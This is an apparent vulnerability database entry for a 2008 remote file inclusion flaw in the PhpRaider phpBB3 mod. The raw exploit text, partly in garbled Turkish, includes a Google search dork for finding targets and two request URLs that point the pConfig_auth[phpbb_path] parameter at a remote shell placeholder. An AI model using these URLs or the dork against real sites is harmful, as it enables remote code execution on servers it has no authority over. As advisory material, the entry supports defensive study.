PhpRaider Mod phpbb3 Remote File Include Vulnerability

vendor:

PhpRaider Mod phpbb3

by:

KaCaK a.K.a Dr.Hack3r

8.8

CVSS

HIGH

Remote File Include

CWE

Product Name: PhpRaider Mod phpbb3

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PhpRaider Mod phpbb3 Remote File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'pConfig_auth[phpbb_path]' parameter to '/path/authentication/phpbb3/phpbb3.functions.php' script. A remote attacker can include arbitrary files from remote hosts and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the application from including files from external sources.

Source

Exploit-DB raw data:

< ------------------- header data start ------------------- >

#############################################################

# Application Name : PhpRaider Mod phpbb3

# Vulnerable Type : Remote File Include

# Google Keyword : Powered by phpRaider v1.0.7

# Infection : Ä°lgili site ve sunucuya eriÅŸim saÄŸlanabilir.

# Bug Fix Advice : Undefined deÄŸerler, tanÄ±mlanmalÄ±dÄ±r.

# author : KaCaK a.K.a Dr.Hack3r

# Error Code : include_once($pConfig_auth['phpbb_path'].'common.php');

Kacakizm Bir YaÅŸam Felsefesi

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

www.site.com/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]

< -- bug code end of -- >

# milw0rm.com [2008-05-24]